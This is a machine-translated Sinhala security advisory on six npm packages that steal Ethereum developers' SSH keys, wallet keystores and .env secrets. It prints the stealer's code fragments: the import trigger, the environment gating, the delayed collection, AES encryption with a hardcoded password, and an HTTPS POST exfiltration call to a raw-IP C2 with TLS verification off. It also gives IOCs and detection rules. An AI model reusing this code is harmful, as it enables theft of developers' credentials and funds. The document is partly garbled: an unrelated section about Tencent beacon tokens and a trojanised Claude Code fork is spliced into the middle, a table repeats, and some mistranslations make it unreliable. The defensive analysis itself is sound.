TL; ඩී
2026 මැයි 6 වන දින, තනි npm ප්රකාශකයෙක්, namikazesarada010206, Ethereum, Solidity සහ DeFi සංවර්ධක පරිසර පද්ධතිය ඉලක්ක කරගත් ද්වේශ සහගත පැකේජ හයක් තල්ලු කළේය.
පැකේජ, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, සහ web3-utils-core, ජනප්රිය Web3 මෙවලම් සඳහා උපකාරක පුස්තකාල මෙන් පෙනෙන පරිදි නිර්මාණය කර ඇති පිළිගත හැකි නම් භාවිතා කළේය.
පැකේජ හයේම එකම දේ අඩංගු විය. telemetry.js ගොනුව. ගොනුව පොකුර පුරා බයිට්-සමාන වූ අතර SHA-256 සමඟ:
ස්ථාපන අවස්ථාවේදී අනිෂ්ට මෘදුකාංග ක්රියාත්මක නොවේ. නැත preinstall or postinstall කොක්ක. ඒ වෙනුවට, පැකේජය ආයාත කළ විට එය සක්රිය වේ require().
ඒ විස්තරය වැදගත්.
සංවර්ධකයෙකු පැකේජය සැබවින්ම භාවිතා කරන තෙක් බද්ධ කිරීම බලා සිටී. ඉන්පසු එය වැඩපොළ සැබෑ Ethereum / Solidity සංවර්ධන පරිසරයක් මෙන් පෙනේදැයි පරීක්ෂා කරයි. එය Alchemy හෝ Infura යතුරු, පුද්ගලික යතුරු, මතක සටහන්, ඩිප්ලෝයර් යතුරු හෝ දේශීය Foundry නාමාවලියක් සොයයි.
සත්කාරක සමාගම ගැලපෙන්නේ නම්, සොරකම් කරන්නා SSH පුද්ගලික යතුරු, Foundry / Geth / Brownie wallet keystores එකතු කරයි, .env* ගොනු සහ සංවේදී පරිසර විචල්යයන්. එය දෘඪ කේතනය කළ මුරපදයක් භාවිතයෙන් AES-256-GCM සමඟ බණ්ඩලය සංකේතනය කර TLS සත්යාපනය අක්රිය කර ඇති අමු IPv4 C2 අන්ත ලක්ෂ්යයකට එය පිට කරයි.
Xygeni හි අනිෂ්ට මෘදුකාංග පූර්ව අනතුරු ඇඟවීමේ (MEW) පද්ධතිය මඟින් සියලුම පැකේජ හයම අනිෂ්ට බව තහවුරු කරන ලදී. npm රෙජිස්ට්රි ඉවත් කිරීමේ වාර්තා බණ්ඩලය පොරොත්තුවෙන් පවතී.
පොකුර: පැකේජ හයක්, එක් ප්රකාශකයෙක්
ප්රකාශක ගිණුම namikazesarada010206 සත්යාපනය නොකළ Gmail ලිපිනයට සම්බන්ධ කර ඇත. namikazesarada010206@gmail.com.
මෙම ප්රචාරණ ව්යාපාරය 2026 මැයි 6 වන දින එක් දින ප්රකාශන පිපිරීමක් ලෙස දර්ශනය විය. සියලුම පැකේජ හයම අනුවාදනය කරන ලද්දේ 1.0.0, සතුව ශුන්ය ධාවන කාල පරායත්තතා තිබූ අතර, ගොනු තුනක් පමණක් නැව්ගත කරන ලදී:
package.json index.js telemetry.js ඔවුන් එම මූලාශ්ර ගබඩාව ද ප්රකාශ කළහ:
https://github.com/harunosakura030303-maker/evmchain-config පළමු ප්රකාශනයේ දී පළමු පැකේජ තුන MEW ස්කෑනර් යන්ත්ර මගින් අල්ලා ගන්නා ලදී. ප්රකාශකයාගේ npm පැතිකඩ විශ්ලේෂක සමාලෝචනයෙන් පසුව ඉතිරි තුන බලහත්කාරයෙන් සලකුණු කරන ලදී. වරක් එකම බයිට්-සමාන telemetry.js පොකුර පුරා තහවුරු කරන ලද අතර, ඒවා අනුකූලතාවයෙන් ද්වේෂසහගත ලෙස වසා දමන ලදී.
| පැකේජය | පිටපත | npm ප්රකාශයට පත් කරන ලදී | MEW ටිකට්පත | තීන්දුව |
|---|---|---|---|---|
| වීම්-කෝර් | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | ද්වේෂසහගත |
| viem-utils-coreකර්තෘ: viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | ද්වේෂසහගත |
| හාඩ්හැට්-කෝර්-උපයෝගිතා | 1.0.0 | 2026-05-06 | #51051 | ද්වේෂසහගත |
| evm-utils විසින් තවත් | 1.0.0 | 2026-05-06 | #51069 | අනුකූලතාවයෙන්, ද්වේෂසහගත |
| වාත්තු නිෂ්පාදන | 1.0.0 | 2026-05-06 | #51071 | අනුකූලතාවයෙන්, ද්වේෂසහගත |
| web3-utils-core යනු කුමක්ද? | 1.0.0 | 2026-05-06 | #51070 | අනුකූලතාවයෙන්, ද්වේෂසහගත |
නම් කිරීමේ උපාය මාර්ගය සරල නමුත් ඵලදායී වේ.
මෙම පැකේජ නිශ්චිත උඩුගං බලා නම් අනුකරණය නොකරයි. ඒ වෙනුවට, ඒවා භාවිතා කරන්නේ -core, -utils, සහ -utils-coreඑමඟින් ඒවා Web3 මෙවලම් අසල සංවර්ධකයෙකු දැකීමට අපේක්ෂා කළ හැකි සහකාර පුස්තකාල මෙන් පෙනේ.
| අනිෂ්ට පැකේජය | නීත්යානුකූල ඉලක්කය |
|---|---|
| වීම්-කෝර් | viem, ජනප්රිය Ethereum TypeScript සේවාදායකයෙක් |
| viem-utils-coreකර්තෘ: viem-utils-core | වීම් |
| හාඩ්හැට්-කෝර්-උපයෝගිතා | හාර්ඩ්හැට්, ප්රධාන ධාරාවේ සොලිඩිටි සංවර්ධන පරිසරයක් |
| evm-utils විසින් තවත් | සාමාන්ය EVM මෙවලම් නාම අවකාශය |
| වාත්තු නිෂ්පාදන | වාත්තු කර්මාන්තය, Solidity මෙවලම් දාමයක් |
| web3-utils-core යනු කුමක්ද? | web3-utils, Web3.js උදව්කරුවන් |
මෙය "අතිරේක පැකේජය" රටාවයි: "මම සැබෑ පැකේජය" නොව, "මම සැබෑ පැකේජය වටා සාධාරණ සහායකයෙකු ලෙස පෙනේ."
ඉක්මනින් ගමන් කරන DeFi සංවර්ධකයින් සඳහා, එය අවදානමක් ඇති කිරීමට ප්රමාණවත් වේ.
පැකේජය ආනයනය කළ විට සිදු වන දේ
ප්රහාරක දාමය කුඩා, හිතාමතා සිදු කරන ලද අතර ගුප්ත-සංවර්ධන පරිසරයන් කෙරෙහි අවධානය යොමු කර ඇත.
ස්ථාපන කොක්කක් නොමැත. ඒ වෙනුවට, සෑම පැකේජයකටම ඇතුළත් වන්නේ index.js එය stub ක්රියාකාරීත්වය අපනයනය කර පසුව අනිෂ්ට ටෙලිමෙට්රි මොඩියුලය පූරණය කරයි.
require('./telemetry').init(); මෙයින් අදහස් කරන්නේ පළමු ආයාතයේදීම අනිෂ්ට මෘදුකාංගය ක්රියාත්මක වන බවයි.
එය ප්රහාරකයාට ක්රියාකාරීව ප්රයෝජනවත් වේ. බොහෝ ස්කෑනර් සහ වැලි පෙට්ටි ස්ථාපන-කාල හැසිරීම කෙරෙහි අවධානය යොමු කරයි. මෙම පැකේජය සංවර්ධකයෙකු, ගොඩනැගීමේ ස්ක්රිප්ට්, පරීක්ෂණ කට්ටලයක් හෝ ධාවන කාල මාර්ගයක් විසින් සැබවින්ම භාවිතා කරන තෙක් රැඳී සිටියි.
සක්රිය කිරීමේ ද්වාරය: සැබෑ Web3 සංවර්ධක වැඩපොළවල් මත පමණක් ගිනි තැබීම
බද්ධ කිරීමේ වැදගත්ම කොටස වන්නේ සක්රීය කිරීමේ දොරටුවයි.
Ethereum / Solidity සංවර්ධක යන්ත්රවල බහුලව දක්නට ලැබෙන පරිසර විචල්යයන් සඳහා අනිෂ්ට මෘදුකාංග පරීක්ෂා කරයි:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); එය Foundry ස්ථාපනය කර ඇති බවක් පෙනෙන්නට තිබේද යන්න ද පරීක්ෂා කරයි:
fs.existsSync(path.join(os.homedir(), '.foundry')) කිසිදු කොන්දේසියක් සත්ය නොවේ නම්, ශ්රිතය නැවත පැමිණෙන අතර කිසිවක් නොකරයි.
එමඟින් සාමාන්ය විශ්ලේෂණ පරිසරයන් තුළ පැකේජය නිහඬ වේ. Foundry, Alchemy යතුරු, Infura යතුරු, පුද්ගලික යතුරු හෝ මතක සටහන් නොමැති වැලිපිල්ලකට හානිකර පෙනුමක් ඇති ආයාතයක් දැකිය හැකිය.
ගැලපෙන සත්කාරකයක, අනිෂ්ට මෘදුකාංගය එකතු කිරීමට පෙර තත්පර 60 සිට 90 දක්වා රැඳී සිටියි:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); ප්රමාදය ආනයනය සහ බැහැර කිරීම අතර පැහැදිලි සහසම්බන්ධය අඩු කරයි. .unref() පැකේජය කෙටි කාලීන ස්ක්රිප්ට් එකකින් ආයාත කර ඇත්නම්, call මඟින් ධාරක ක්රියාවලිය සාමාන්යයෙන් පිටවීමට ඉඩ සලසයි.
මෙය ඝෝෂාකාරී ලෙස කඩාකප්පල් කර අල්ලා ගැනීමේ හැසිරීමක් නොවේ. සංවර්ධක පරිසරය සොරකම් කිරීම වටී නම් මිස ධාවනය වීම වැළැක්වීම සඳහා නිර්මාණය කර ඇති ඉලක්කගත සොරකම් කරන්නෙකි.
සොරකම් කරන්නා එකතු කරන දේ
සක්රිය කිරීමේ ද්වාරය පසු කළ පසු, අනිෂ්ට මෘදුකාංගය Web3 සංවර්ධනයේ වඩාත්ම වැදගත් මූලාශ්රවලින් එකතු කරයි: පුද්ගලික යතුරු, මුදල් පසුම්බි යතුරු ගබඩා, යෙදවීමේ අක්තපත්ර, වලාකුළු රහස්, npm ටෝකන සහ දේශීය ව්යාපෘති වින්යාසය.
| මූලාශ්රය | එකතු කරන දේ |
|---|---|
| ක්රියාවලිය.env | ඕනෑම විචල්ය ගැළපීමක් /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* ~/.ssh/* | සම්පූර්ණ ගොනු අන්තර්ගතය ඇතුළුව, PRIVATE KEY හෝ BEGIN OPENSSH අඩංගු ගොනු |
| ~/.ෆවුන්ඩ්රි/කීස්ටෝර්ස්/* | ෆවුන්ඩ්රි පසුම්බියේ යතුරු ගබඩා ගොනු |
| ~/.ethereum/යතුරු ගබඩාව/* | ගෙත් පසුම්බියේ යතුරු ගබඩා ගොනු |
| ~/.බ්රව්නි/ගිණුම්/* | බ්රව්නි පසුම්බියේ යතුරු ගබඩා ගොනු |
| ${cwd}/.env | සම්පූර්ණ ගොනු අන්තර්ගතය |
| ${cwd}/.env.දේශීය | සම්පූර්ණ ගොනු අන්තර්ගතය |
| ${cwd}/.env.නිෂ්පාදනය | සම්පූර්ණ ගොනු අන්තර්ගතය |
| ${cwd}/.env.සංවර්ධනය | සම්පූර්ණ ගොනු අන්තර්ගතය |
| os.ධාරක නාමය() | සත්කාරක පාර-දත්ත |
| crypto.randomUUID() යනු කුමක්ද? | වින්දිතයා/සැසි හඳුනාගැනීම |
| දිනය.දැන්() | එකතු කිරීමේ කාල මුද්රාව |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA ටෝකන වන්නේ:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 දුරස්ථමිතිය ක්රියාකරුගේම විශ්ලේෂණ ක්රමයක්ද නැතහොත් වෙනම මුදල් ඉපැයූ නාලිකාවක්ද යන්න අපට තහවුරු කිරීමට නොහැකි වී තිබේ. අප පරීක්ෂා කළ සාම්පල දෙකෙහිම ATTA ටෝකන සමාන වේ.
B පොකුර: හෙයිබායි
claude.hk OAuth තතුබෑම් + ANTHROPIC_BASE_URL පැහැර ගැනීම
අප්රේල් 1 නියැදිය, මෙම ව්යාපාරයේ වඩාත් රළු සහ කලින් හස්තයයි.
heibai:2.1.88-claude.hk-4 විසින් ප්රකාශයට පත් කරන ලදී wuguoqiangvip28, 2025 ජුනි 7 වන දින නිර්මාණය කරන ලද ගිණුමකි. පැකේජය පැහැදිලිවම නීත්යානුකූල අනුවාදයට එරෙහිව අනුවාදයක් විය. 2.1.88 මානව මුදා හැරීම.
එය CA-cert MITM සමඟ කරදර වන්නේ නැත. ඒ වෙනුවට, එය OAuth අන්ත ලක්ෂ්යය පිළිබඳව පරිශීලකයාට බොරු කියයි.
කාන්දු වූ ක්ලෝඩ් කේත මූලාශ්රයට ඉහළින් ඇති ද්වේශසහගත එකතු කිරීම්වලට ඇතුළත් වන්නේ:
| මූලාශ්රය | එකතු කරන දේ |
|---|---|
| ක්රියාවලිය.env | ඕනෑම විචල්ය ගැළපීමක් /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* ~/.ssh/* | සම්පූර්ණ ගොනු අන්තර්ගතය ඇතුළුව, PRIVATE KEY හෝ BEGIN OPENSSH අඩංගු ගොනු |
| ~/.ෆවුන්ඩ්රි/කීස්ටෝර්ස්/* | ෆවුන්ඩ්රි පසුම්බියේ යතුරු ගබඩා ගොනු |
| ~/.ethereum/යතුරු ගබඩාව/* | ගෙත් පසුම්බියේ යතුරු ගබඩා ගොනු |
| ~/.බ්රව්නි/ගිණුම්/* | බ්රව්නි පසුම්බියේ යතුරු ගබඩා ගොනු |
| ${cwd}/.env | සම්පූර්ණ ගොනු අන්තර්ගතය |
| ${cwd}/.env.දේශීය | සම්පූර්ණ ගොනු අන්තර්ගතය |
| ${cwd}/.env.නිෂ්පාදනය | සම්පූර්ණ ගොනු අන්තර්ගතය |
| ${cwd}/.env.සංවර්ධනය | සම්පූර්ණ ගොනු අන්තර්ගතය |
| os.ධාරක නාමය() | සත්කාරක පාර-දත්ත |
| crypto.randomUUID() යනු කුමක්ද? | වින්දිතයා/සැසි හඳුනාගැනීම |
| දිනය.දැන්() | එකතු කිරීමේ කාල මුද්රාව |
ඉලක්ක ලැයිස්තුව ඉතා නිශ්චිතයි. මෙය සාමාන්ය බ්රව්සර් සොරකමක් හෝ පුළුල් අක්තපත්ර සීරීමක් නොවේ. එය Ethereum යෙදුම් ගොඩනඟන, පරීක්ෂා කරන, යෙදවීමේ හෝ ක්රියාත්මක කරන සංවර්ධකයින් ඉලක්ක කර ගෙන ඇත.
Foundry, Geth සහ Brownie යතුරු ගබඩා ඇතුළත් කිරීම විශේෂයෙන් වැදගත් වේ. මෙම ගොනු පසුම්බි හෝ යෙදවුම් අනන්යතා වෙත සෘජු ප්රවේශය නියෝජනය කළ හැකිය. ප්රහාරකයාට ඒවා මුරපද, මතක සටහන් හෝ පරිසර රහස් සමඟ යුගල කළ හැකි නම්, ඔවුන්ට අරමුදල් ගෙනයාමට, යෙදවුම්කරුවන් ලෙස පෙනී සිටීමට හෝ ස්මාර්ට් කොන්ත්රාත් මෙහෙයුම් සම්මුතියකට ගෙන ඒමට හැකි විය හැකිය.
බැහැර කිරීමට පෙර සංකේතනය
අනිෂ්ට මෘදුකාංගය එකතු කරන ලද දත්ත පිටතට යැවීමට පෙර සංකේතනය කරයි.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); දෘඪ කේතනය කළ මුරපදය:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d අවසාන ගෙවීම JSON ලෙස ඔතා ඇත:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} සංකේතනය මඟින් අනිෂ්ට මෘදුකාංගය තනිවම දියුණු නොවේ. කෙසේ වෙතත්, එය ජාල පරීක්ෂාව දුෂ්කර කරයි. පිටවීම නරඹන ආරක්ෂකයෙකුට JSON ගෙවීමක් පෙනෙනු ඇත, නමුත් සොරකම් කරන ලද යතුරු, පසුම්බි ගොනු හෝ .env දෘඪ කේතනය කළ මුරපද සහ විකේතන තර්කනය නොමැතිව අන්තර්ගතයන්.
අමු IPv4 C2 වෙත බැහැර කිරීම
පිටකිරීමේ මාර්ගය දෘඪ කේතනය කර ඇත:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); අනිෂ්ට මෘදුකාංගය දත්ත යවන්නේ:
https://76.13.37.80:8443/api/v1/telemetry විස්තර දෙකක් කැපී පෙනේ.
පළමුව, C2 යනු වසමකට වඩා අමු IPv4 ලිපිනයකි. එමඟින් වසම් ලියාපදිංචි කිරීමේ අවශ්යතාවය ඉවත් කරන අතර සමහර වසම් පාදක අනාවරණ වළක්වයි.
දෙවනුව, TLS සත්යාපනය පහත පරිදි අක්රිය කර ඇත:
rejectUnauthorized: false එමඟින් අනිෂ්ට මෘදුකාංගයට ස්වයං-අත්සන් කළ සහතික ඇතුළු ඕනෑම සහතිකයක් පිළිගැනීමට ඉඩ සලසයි. වෙනත් වචන වලින් කිවහොත්, ප්රහාරකයාට වලංගු පොදු සහතිකයක් අවශ්ය නොවී සංකේතාත්මක ප්රවාහනය ලැබේ.
නැවත උත්සාහ කිරීමේ තර්කනයක් සහ පසුබැසීමේ සත්කාරකයක් නොමැත. දෝෂ නිහඬව ගිල දමනු ලැබේ. C2 නොබැඳි නම් හෝ ළඟා විය නොහැකි නම් මෙය පැකේජය නිහඬව තබයි.
මෙම ව්යාපාරය වැදගත් වන්නේ ඇයි?
සංවර්ධකයින් ඉලක්ක කරගත් බොහෝ ද්වේෂසහගත npm පැකේජ පුළුල් අක්තපත්ර පසුපස හඹා යයි: npm ටෝකන, AWS යතුරු, GitHub ටෝකන, හෝ .npmrc ගොනු.
මෙම ව්යාපාරය ඉලක්කය පටු කරයි.
එය යන්ත්රය Ethereum හෝ Solidity සංවර්ධකයෙකුට අයත් බවට සලකුණු සොයයි. ඉන්පසු එය එම පරිසරයේ වැදගත් වන වත්කම් හරියටම ඇද ගනී: පසුම්බි යතුරු ගබඩා, පුද්ගලික යතුරු, මතක සටහන්, ඩිප්ලෝයර් යතුරු, .env ගොනු සහ SSH යතුරු.
එමඟින් මෙම ව්යාපාරය Web3 කණ්ඩායම් සඳහා සාමාන්ය npm සොරකම් කරන්නෙකුට වඩා භයානක වේ.
සාර්ථක ආසාදනයක් නිරාවරණය විය හැකිය:
- විහිදුම් පසුම්බි
- ස්මාර්ට් කොන්ත්රාත් පරිපාලක යතුරු
- RPC සැපයුම්කරු යතුරු
- වලාකුළු යෙදවීමේ අක්තපත්ර
- npm ප්රකාශන ටෝකන
- සංවර්ධක හෝ ගොඩනැගීමේ යටිතල පහසුකම් සඳහා SSH ප්රවේශය
- ව්යාපෘති රහස් ගබඩා කර ඇත
.envගොනු - ෆවුන්ඩ්රි, ගෙත් හෝ බ්රව්නි සඳහා පසුම්බි යතුරු ගබඩා
පැකේජ නම් ද පැහැදිලි සමාජ ඉංජිනේරු විද්යාව පෙන්නුම් කරයි. ඔවුන් හුරුපුරුදු මෙවලම් නම් හරහා Web3 සංවර්ධක පරිසර පද්ධතිය ඉලක්ක කරයි: viem, hardhat, foundry, evm, සහ web3.
නළුවාට සැබෑ ව්යාපෘති පාවා දීමට අවශ්ය නැත. ඔවුන්ට අවශ්ය වන්නේ සාධාරණ සහකාර පැකේජයක් ලෙස පෙනෙන දෙයක් ස්ථාපනය කිරීමට සංවර්ධකයෙකු පමණි.
සම්මුතිය සහ අනාවරණය කිරීමේ දර්ශක
| පැකේජ සහ ප්රකාශක | |
|---|---|
| ක්ෂේත්ර | වටිනාකම |
| npm ප්රකාශකයා | නමිකසේසරද010206 |
| ප්රකාශක ඊමේල් ලිපිනය | namikazesarada010206@gmail.com |
| විද්යුත් තැපෑල සත්යාපනය කර ඇත | නැත |
| SCM තහවුරු කර ඇත | නැත |
| කීර්ති නාම ලකුණු | 1.0 |
| පැකේජ | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, Foundry-utils, web3-utils-core |
| අනුවාද | සියලු 1.0.0 |
| මූලාශ්ර ගබඩාව | https://github.com/harunosakura030303-maker/evmchain-config |
| තහවුරු කරන ලද ද්වේෂසහගත | සියලුම පැකේජ හය |
| ජාල | |
|---|---|
| වර්ගය | වටිනාකම |
| C2 අන්ත ලක්ෂ්යය | https://76.13.37.80:8443/api/v1/telemetry |
| සී 2 අයිපී | 76.13.37.80 |
| C2 තොට | 8443/tcp |
| TLS හැසිරීම | ප්රතික්ෂේප කරන්න අනවසර: අසත්ය |
| ගෙවීම් යෝජනා ක්රමය | {"v":2,"iv": ,"ඩී": ,"ටී": } |
| ගොනු සහ හැෂ් | |
|---|---|
| වර්ගය | වටිනාකම |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| පැකේජ පිරිසැලසුම | package.json, index.js, telemetry.js |
| ගොනු ගණන | 3 |
| ආසන්න මුළු ප්රමාණය | 3.4 කි.බ. |
සක්රිය කිරීමේ සංඥා
මෙම පරිසර විචල්යයන් සඳහා අනිෂ්ට මෘදුකාංගය පරීක්ෂා කරයි:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY එය ද පරීක්ෂා කරයි:
~/.foundry/ ඉලක්කගත සත්කාරක මාර්ග
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development එකතුව Regex
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i හඳුනාගැනීමේ සටහන්
සම්පූර්ණ හැසිරීම් විශ්ලේෂණයක් අවශ්ය නොවී මෙම ව්යාපාරය අල්ලා ගන්නා නීති කිහිපයක් තිබේ.
පළමුව, අනිෂ්ට පැකේජ නම් හය සඳහා lockfiles පරිලෝකනය කරන්න:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core ඕනෑම තරඟයක් package-lock.json, yarn.lock, pnpm-lock.yaml, හෝ node_modules ඉතිහාසය බරපතල සිදුවීමක් ලෙස සැලකිය යුතුය.
දෙවනුව, Node.js ක්රියාවලි කියවීම සඳහා පසුම්බි යතුරු ගබඩා මාර්ග නිරීක්ෂණය කරන්න:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ උපකාරක යැපීමක් ලෙස ආනයනය කරන ලද පැකේජයක් සඳහා මෙය කලාතුරකින් නීත්යානුකූල හැසිරීමකි. පිටතට යන ජාල ක්රියාකාරකම් අනුගමනය කරන විට එය විශේෂයෙන් සැක සහිතය.
තෙවනුව, HTTPS සම්බන්ධතා අවහිර කරන්න හෝ අනතුරු අඟවන්න:
76.13.37.80:8443 විශේෂයෙන් ඉල්ලීම් මාර්ගය වන විට:
/api/v1/telemetry හතරවනුව, මෙම ලක්ෂණ ඒකාබද්ධ කරන npm පැකේජ සොයන්න:
- නැවුම් හෝ අඩු කීර්තියක් ඇති ප්රකාශකයෙක්
- සත්යාපනය නොකළ Gmail ගිණුම
- Web3-යාබද පැකේජ නාමය
- අර්ථවත් ගබඩා ඉතිහාසයක් නොමැත.
- කුඩා පැකේජ පිරිසැලසුම
index.jsඑය දුරස්ථමිතික හෝ උපකාරක ගොනුවක් පූරණය කරයි- ධාවන කාල පරායත්තතා නොමැත
- සංවේදී පරිසර-විචල්ය එකතුව
- පසුම්බිය යතුරු ගබඩා ප්රවේශය
මෙම රටාව තනි IOC එකකට වඩා ප්රයෝජනවත් වන්නේ ඊළඟ පැකේජය IP ලිපිනය වෙනස් කළ හැකි නමුත් එකම ඉලක්කගත තර්කනය තබා ගන්නා බැවිනි.
සම්මුති ප්රතිචාර පිරික්සුම් ලැයිස්තුව
සංවර්ධකයෙකු පැකේජ හයෙන් එකක් භාවිතා කර ඔවුන්ගේ පරිසරය සක්රිය කිරීමේ ද්වාරයට ගැලපේ නම්, වැඩපොළ අවදානමට ලක් වූ එකක් ලෙස සලකන්න.
එයට Foundry ස්ථාපනය කර ඇති යන්ත්ර, පරිසරයේ Alchemy හෝ Infura යතුරු, පුද්ගලික යතුරු, මතක සටහන් හෝ ඩිප්ලෝයර් යතුරු ඇතුළත් වේ.
නිර්දේශිත ප්රතිචාරය:
- ජාලයෙන් ධාරකය විසන්ධි කරන්න.
- සංරක්ෂණය
node_modules, ලොක්ෆයිල්, කවච ඉතිහාසය සහ අධිකරණ වෛද්ය විද්යාව සඳහා අදාළ ලොග්. - සෑම SSH යතුරු යුගලයක්ම
~/.ssh/. - සෑම යතුරු ගබඩාවක් සඳහාම පසුම්බි යතුරු කරකවන්න
~/.foundry,~/.ethereum, සහ~/.brownie. - අරමුදල් නව මුදල් පසුම්බි වෙත මාරු කරන්න.
- ගබඩා කර ඇති සෑම රහසක්ම කරකවන්න
.env*සංවර්ධකයා වැඩ කළ ගබඩාවල ඇති ගොනු. - AWS යතුරු, npm ටෝකන, ඩිප්ලෝයි ටෝකන, API යතුරු, පුද්ගලික යතුරු, බීජ සහ මතක සටහන් ඇතුළුව එකතු කිරීමේ රීජෙක්ස් වලට ගැලපෙන පරිසර රහස් කරකවන්න.
- පැකේජය මුලින්ම ස්ථාපනය කළ දා සිට cloud, npm, GitHub, RPC සැපයුම්කරු සහ blockchain ක්රියාකාරකම් විගණනය කරන්න.
- නැවත භාවිතා කිරීමට පෙර වැඩපොළ නැවත රූපගත කරන්න.
ආරක්ෂකයින් රැගෙන යා යුතු දේ
මෙම ව්යාපාරය ඉහළ වටිනාකමක් ඇති සංවර්ධක පරිසර පද්ධති වටා npm typosquatting පරිණාමය වන ආකාරය පෙන්වයි.
නළුවාට නොපසුබට උත්සාහය අවශ්ය නොවීය. ඔවුන්ට අපැහැදිලි කිරීමක් අවශ්ය නොවීය. ඔවුන්ට ස්ථාපන-කාල ක්රියාත්මක කිරීම පවා අවශ්ය නොවීය.
ඒ වෙනුවට, ඔවුන් කරුණු තුනක් මත විශ්වාසය තැබූහ:
- පිළිගත හැකි Web3 පැකේජ නම්
- සැබෑ ගුප්ත-සංවර්ධන යන්ත්ර මත පමණක් සක්රිය කිරීම
- Ethereum සංවර්ධකයින්ට වඩාත්ම වැදගත් වන ලිපිගොනු සහ රහස් සෘජුවම සොරකම් කිරීම
එමඟින් පුළුල් පරිලෝකනයකදී මෙම ව්යාපාරය මඟ හැරීමට පහසු වන අතර එය නිවැරදි පරිසරයට ගොඩබසින විට අනතුරුදායක වේ.
Web3 කණ්ඩායම් සඳහා, පාඩම පැහැදිලිය: යැපුම් නම් ඔබේ තර්ජන ආකෘතියේ කොටසක් ලෙස සලකන්න. හානිකර සහායකයෙකු මෙන් පෙනෙන පැකේජයක් තවමත් මුදල් පසුම්බිය සම්මුතියට කෙටිම මාර්ගය බවට පත්විය හැකිය.
npm ලේඛකාධිකාරයට වාර්තා කරන ලදී. ප්රකාශක ගිණුම සහ පැකේජ ඉවත් කළ විට අපි මෙම සටහන යාවත්කාලීන කරන්නෙමු.




